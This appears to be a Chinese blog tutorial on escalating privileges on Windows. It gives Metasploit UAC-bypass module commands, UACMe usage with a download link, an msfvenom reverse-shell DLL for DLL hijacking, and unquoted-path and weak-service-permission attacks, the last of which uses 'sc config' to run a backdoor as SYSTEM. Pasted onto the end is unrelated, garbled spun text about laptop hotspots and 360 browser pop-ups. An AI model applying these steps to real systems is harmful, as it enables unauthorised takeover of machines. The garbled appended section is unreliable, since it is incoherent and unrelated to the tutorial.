??關于Windows提權應該這篇總結完就結束了,再次提醒一下關于第三方軟件或插件提權,不是不寫,而且有些軟件都會自動更新,很多漏洞基本上很少遇到,同時也利用不了,比如說:向日葵有一個版本能夠提權,但是現在那個版本裝再電腦上,根本連接不上向日葵的服務器,更何談提權呢,同時還可以看日志,目前日志也更改了,端口不會再日志中出現了。
??前面幾篇文章我就匯總在下面了,同時關于UAC提權之前一篇文章寫的沒那么細,這里重新補充一下。
??Windows權限提升—令牌竊取、UAC提權、進程注入等提權
??Windows權限提升 —SQL Server/MSSQL數據庫提權
??Windows權限提升—MySQL數據庫提權
??Windows權限提升—溢出提權
??UAC(User Account Control,用戶賬號控制)是微軟為了提高系統安全性在Windows Vista中引入的技術。UAC要求用戶在執行可能影響計算機運行的操作或在進行可能影響其他用戶的設置之前,擁有相應的權限或者管理員密碼。UAC在操作啟動前對用戶身份進行驗證,以避免惡意軟件和間諜軟件在未經許可的情況下在計算機上進行安裝操作或者對計算機設置進行更改。
??在Windows Vista及以后的版本中,微軟設置了安全控制策略,分為高、中、低三個等級。高等級的進程有管理員權限;中等級的進程有普通用戶權限;低等級的進程,權限是有限的,以保證系統在受到安全威脅時造成的損害最小。在權限不夠的情況下,訪問系統磁盤的根目錄、Windows目錄,以及讀寫系統登錄數據庫等操作,都需要經常UAC(User Account Control,用戶賬號控制)的認證。
??這里我就不演示如何設置監聽與生成木馬了,在前面的文章中都提到相關的操作。
??這里是基于默認等級的哦,如果被設置為最高的話,那就涼涼了,因為需要人為去點擊,但是我們正常需要提權都是由于我們獲取的權限太低,或者遠程桌面打不開,你如何去點擊,都無法點擊了,何談提權。
??這里的UAC狀態是默認,也就是中等級別,至于打開這個UAC可以在運行框中輸入"msconfig",然后工具一欄就能看到更改UAC設置。
??一般UAC關閉的情況下使用getsystem就能夠提權成功。
??這里在嘗試使用getsystem提權,發現無法提權,那么就需要使用UAC進行繞過了。
background ##將會話置于后臺,不然會在使用bypass的找不到會話。??這里能夠看到有很多的UAC繞過的bypass方式,但是這里面是分不同Windows版本的,有的可能在Windows7上能用,有的可能就不能用,不過最好選擇日期靠近的,這樣成功率大一點。
search uac ##搜索use exploit/windows/local/bypassuac ##選擇bypass
sessions ##選擇會話
set session 1 ##設定會話
set lport 5555 ##設定反彈端口,這里不設置也可以,但是有時候直接反彈回來,會出現反彈不成功的情況。
run ##執行??通過反彈回來的效果能夠看到,成功提權了。
??這里還是使用默認的UAC等級進行提權。
??可以看到,這里同樣是提權失敗。
??這里我也是嘗試了好幾個bypass才成功的,環境不同,可能使用到的bypass也是不同的,有些bypass需要也能提權,但是需要點擊確定,所以多嘗試嘗試。
use exploit/windows/local/bypassuac_silentcleanup ##選擇模塊
sessions ##選擇會話
set session 5 ##設置會話
set lport 6666 ##設置監聽端口
run ##執行??這里能夠看到是成功提權了。
??這里我就不搭建WEB環境了,UACMe提取可以在低權限的時候提權,但是同樣在UAC設置為高的時候同樣也是無法進行直接提權的,需要人為的去點擊確定才可以。
??UACMe工具涵蓋了Windows7-11以及server服務器系統均可以提權。
??同時這里我就演示個Windows10系統的,至于Windows7肯定要比Windows10好提權。
注意想要使用這個工具需要對其進行編譯成功.exe文件,而我這里沒有最新的.exe文件,這里給個老版的,但是也沒差到哪里去,具體使用的介紹建議去GitHub上自己看。
??UACMe:GitCode - 開發者的代碼家園
??百度網盤UACMe:https://pan.baidu.com/s/1Tt-s2kluGJTr0hGwFR6y7w?pwd=86lm
提取碼:86lm
??這里在下載完UACMe的時候,里面會有兩個exe執行文件,一個是32位的,一個是64位的,按照不同的系統位數,放入不同的exe文件進行執行。
??注意這里彈出的窗口只是演示,在實際的環境中,我們無法登錄桌面,可以使用改工具去運行木馬后門,讓其上線即可。
??至于編號,新版的UACMe里包含70余種,可以一個一個嘗試。
語法:Akagi64.exe 編號??這里同樣我們監聽一下端口,并且利用工具進行反彈上線。
語法:Akagi64.exe 編號 后門程序地址??這里反彈上來的可能還是普通管理員權限,這里可以使用getsystem進行再次提權,可以看到成功提權。
??Windows 程序啟動的時候需要 DLL。如果這些 DLL 不存在,則可以通過在應用程序要查找的位置放置惡意 DLL 來提權。通常,Windows 應用程序有其預定義好的搜索 DLL 的路徑。
??它會根據下面的順序進行搜索:
1、應用程序加載的目錄
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、當前工作目錄 Current Working Directory,CWD
6、在 PATH 環境變量的目錄(先系統后用戶)??程序運行一般會加載系統dll或本身程序自帶的dll,如果我們將程序執行時需要加載的dll文件替換成程序,那么我們下次在啟動程序時所加載的dll就是我們替換的那個木馬程序了。
??這里會出現一個問題,沒有遠程桌面我們如何收集,這里其實有個很簡單的辦法就是,通過上線普通木馬后,看看能不能查看有存在哪些服務,然后找到相關服務本地安裝,安裝后使用火絨劍等工具進行查找加載的dll文件即可。
??像系統文件加載的dll我們是動不了的,我們一般能懂的都是未知文件和數字簽名文件。
??這里我們選中libeay32.dll文件,我們就制作這個木馬。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll??這里將生成的dll文件替換原本的dll。
??運行軟件,不過需要注意的是,在實際環境中由于我未獲取到桌面權限,所以需要等待管理員去運行,同時由于我們替換了dll文件,所以會導致管理員在運行軟件的時候會出現無響應的情況,這時無法保證,管理員會卸載重新安裝。
??這里設置監聽,當管理員去運行軟件的時候就會上線,像上面提到的,當軟件不能用了,無法保證管理員不會卸載重裝或者重啟電腦,所以在獲取權限后需要及時的移植到其它進程上面。
??可以看到的是成功上線了。
??我這里沒有提權成功,可能是由于系統問題,但是調試了半天也沒成功,這也能夠證明不是所有提權方式都是能夠百分比提權成功的,這里也只是演示,可以用這個方式進行提權。
??前面的分析與劫持等步驟就不在贅述了,直接看案效果把。
??可以看到這里使用Windows2012就能夠成功提權,所以之前提到的有些提權方式是根據不同系統可能有不同的效果。
??注意提權方式和操作系統版本等都沒有任何關系。
??當Windows服務運行時,會發生以下兩種情況之一。如果給出了可執行路徑,并且引用了完整路徑,則系統會按字面解釋它并執行。但是,如果服務的二進制路徑未包含在引號中,則操作系統將會執行找到的空格分隔的服務路徑的第一個實例。
??不過這個確實局限性還是很大的,比如虛擬機中沒有找到這樣的情況,實體機沒有找到,客戶現場機器也沒找到…同時還有一個問題是就算有,很多都是在C盤中,如果基本權限不夠大,那么也涼涼,也用不了。
??這里的圖片我借用一下其它博客的,由于我自己電腦以及其它電腦,虛擬機都沒有這樣的路徑。
次序執行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe??而通過下面的語句可以判斷系統中是否存在這類問題,這里找到不代表就一定會存在問題,你看下面的圖片明顯無法進行替換。
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """??這里由于我的虛擬機中并沒有這樣的路徑,而且不好模擬,所以這里主要就是將一下流程,我們就按照第一張圖片上的案例來演示。
c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##獲取到存在問題的路徑??上面是獲取到的錯誤路徑,這里我們可以看到空格是在c:\program后面,那么我們生成一個木馬,然后將木馬名字改為:program.exe,并且發入C盤的根目錄下。
??這里放入C盤的原因是,服務器進行重啟的時候,會按照上面的路徑去尋找,而第一步就是找到C盤,同時又沒有引號,那么當遇到program.exe的時候就會執行。
??這里只需要讓服務重啟就可以了,不過這里同時遇到一個問題就是,當實際環境中是需要管理員去重啟服務,或者重啟服務器的時候啟動,這樣才能上線,不過一般這個上線就是system權限。
??這里我就不演示了,主要沒有那個條件,整體的流程就是這樣的。
??Windows服務有時被配置為與服務本身或與服務運行的目錄相關的弱權限。這可能允許攻擊者操縱服務,以便在其啟動時執行任意代碼,并將權限提升到SYSTEM。
??將服務的 binpath 更改為我們上傳的木馬文件路徑,以便在服務啟動時執行惡意代碼從而獲得system權限,這里可以利用accesschk.exe工具輔助實現。
??accesschk是一個windows系統配置檢查工具,用于查看文件、注冊表項、服務、進程、內核對象等的有效權限。該工具將有助于識別當前用戶是否可以修改某個服務目錄中的文件,由于它是微軟官方出品,我們將其上傳至靶機,執行不會受到阻礙。
AccessChk - Sysinternals | Microsoft Learn
??這里將下載下來的工具上傳至靶機中,這里我使用Windows server2012做演示。這里我為了測試方便,直接在靶機中去操作,而實際環境中可能需要在webshell工具中去操作。
??還需要注意的是第一次執行accesschk.exe會跳出一個提示窗口讓我們接受許可,我們執行命令繞過以自動接受。
accesschk.exe /accepteula??檢測服務權限配置:執行命令檢測,檢測當前用戶可以操作的服務項,注意當前用戶操作的服務項,需要先判斷自己獲取到的權限是什么,然后去執行。
accesschk.exe -uwcqv "Administrators" *??這里通過修改服務路徑的指向來執行后門木馬程序的路徑。
sc config "napagent" binpath="C:Users\Public\Downloads\shell.exe"??注意這里設置完后,需要開啟監聽哦,然后重啟服務,但是在實際的環境中是需要管理員對服務進行重啟,需要等待的。
sc start napagent??我這里沒有像別人一樣反彈回來就是system權限,我又進行提權了一下,把權限提成system,如果能夠配合之前提到檢查哪些服務是system權限進行修改,可能效果會更改,當然也會存在局限性。
??同時也又可能是由于我選錯服務了,演示的時候可以多試試,或者百度搜一下對應的服務,找找相關的資料。
??同時還又一個問題就是,提權完的會話容易掉線,服務啟動不了后,系統再結束啟動后,就會離線,所以需要盡快遷移會話。
筆記本怎樣打開熱點資訊欄(筆記本怎樣打開熱點資訊欄顯示)
1、1打開筆記本的設置,點擊網路和Internet2點擊最右邊的聯通熱點3打開熱點的按鍵,再點編輯按鍵4在彈出的框中,可以對熱點的網路名稱,密碼進行設置,點擊保存之后就可以了5打開你手機的WLAN,在上面會出現你;第一步,當打開筆記本彈出熱點新聞窗口時,點擊熱點新聞窗口右上角的菜單按鍵第二步,在彈出來的選項中,點擊設置選項第三步,彈出來一個設置窗口,在上面勾選永久不再彈出,點擊確認第四步,要徹底解決;1開機進系統開始的位置滑鼠右鍵,選擇設置選項2選擇網路和Internet3點選聯通熱點,左邊的選項點選進行開啟聯通熱點功能4選擇所要分享的網路連線后,可以按編輯來更改所要分享的網路名稱;還請將win10更新到1703版本或以上具體方式如下1在筆記本的右下角打開網路設置2打開以后找到聯通熱點功能3打開聯通熱點后我們設置WiFi名稱和WiFi密碼,之后開啟WiFi;筆記本如何設置wifi熱點在打開的窗口中我們看見不僅默認的無線網路聯接之外,新增了一個無線網路聯接選擇本地聯接,這個無線網路聯接就是剛才創建本地網路時拿來承載wifi的無線網路聯接了筆記本如何設置wifi熱點右擊本地聯接,在彈出的菜單窗口中;1打開“設置”,點擊步入主界面選擇“通知和狀態欄”,點擊并步入選擇其“通知管理”選項,這時侯選擇自己想要嚴禁通知的軟件,點擊關掉,不容許通知就可以了2筆記本關掉廣告推送的方式打開瀏覽器,點擊右上角的菜單。
2、方法如下1在筆記本的右下角打開網路設置2打開以后找到聯通熱點功能3打開聯通熱點后我們設置WiFi名稱和WiFi密碼,之后開啟WiFi;華擎筆記本可通過windows自身的命令分享熱點,具體操作步驟如下1在搜索欄輸入cmd回車,步入命令提示符,輸入netshwlanshowdrivers回車,確認是否支持承載網路若顯示“是”,表示支持WIFI熱點,若顯示“否”。
3、現在我們來看一下怎樣解決wps熱點的彈出,假如想要永久將其關掉,這么右鍵點擊我們筆記本最上端的任務欄,之后在彈出的對話框里選擇quot啟動任務管理器quot或是直接按快捷鍵Ctrl+Shift+Esc,接著都會彈出任務管理器窗口如圖所示。
4、1首先,右鍵如圖任務欄的紋樣2選擇“打開#39網路和Internet#39設置”3點擊“移動熱點”4點擊“編輯”5設置名稱和密碼,點擊保存6最后打開熱點注意事項目前,在全球市場上有多種品牌的電腦筆記本,排行;取消筆記本熱點新聞彈窗具體步驟如下1假如你將360新聞窗口關掉后我們打開360安全瀏覽器,在地址欄輸入sesettings按下回車鍵打開實驗室2在右邊點擊“實驗室”按鈕3在左側拉到下邊,找到“熱點新聞”,把;1首先打開熱點新聞窗口,如圖所示2以后點擊熱點新聞窗口右上角的菜單按鍵,如圖所示3之后在彈出來的選項中,點擊設置選項,如圖所示4以后會彈出來一個設置窗口,在上面勾選永久不再彈出,點擊確認;具體操作方式1右鍵點擊熱點資訊,打開文件所在位置2右鍵點擊sesvc,選擇屬性3把這個文件的權限,都設置為拒絕,這樣服務不會運行,也不會彈出熱點資訊了以上就是怎樣解決筆記本開機會彈出熱點資訊的具體操作方式。
5、以蘋果12,iOS14系統,聯想Y9000K,win10系統為例,具體操作方式如下1首先將手機熱點開啟,將筆記本打開至筆記本桌面,找到并點擊步入“網絡”圖標2在打開的“網絡”圖標的頁面中的上方任務欄,找到并點擊打開“網絡和共;01從任務管理器中我們可以看見,這個是360安全瀏覽器,服務組件,看來這個熱點資訊是360瀏覽器的彈窗了02禁用方式一1右鍵點擊熱點資訊,打開文件所在位置032右鍵點擊sesvc,選擇屬性043。